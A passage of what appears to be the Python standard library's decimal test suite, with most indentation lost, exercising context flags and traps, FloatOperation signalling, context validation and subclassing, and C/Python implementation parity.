self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
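        # Mixed Decimal/float comparisons always set FloatOperation.  With the
        # trap enabled, ordering comparisons raise the signal while equality
        # and inequality comparisons merely set the flag; doit() exercises
        # both modes via the `signal` argument.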
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation = self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=0)
self.assertRaises(TypeError, Context, traps=1)
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(C.__libmpdec_version__, P.__libmpdec_version__)
x = [s for s in dir(C) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
y.append('__slots__')
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_quantize_watchexp(self):
# watchexp functionality
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
x = Decimal(99999).quantize(Decimal("1e3"), watchexp=False)
self.assertEqual(x, Decimal('1.00E+5'))
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
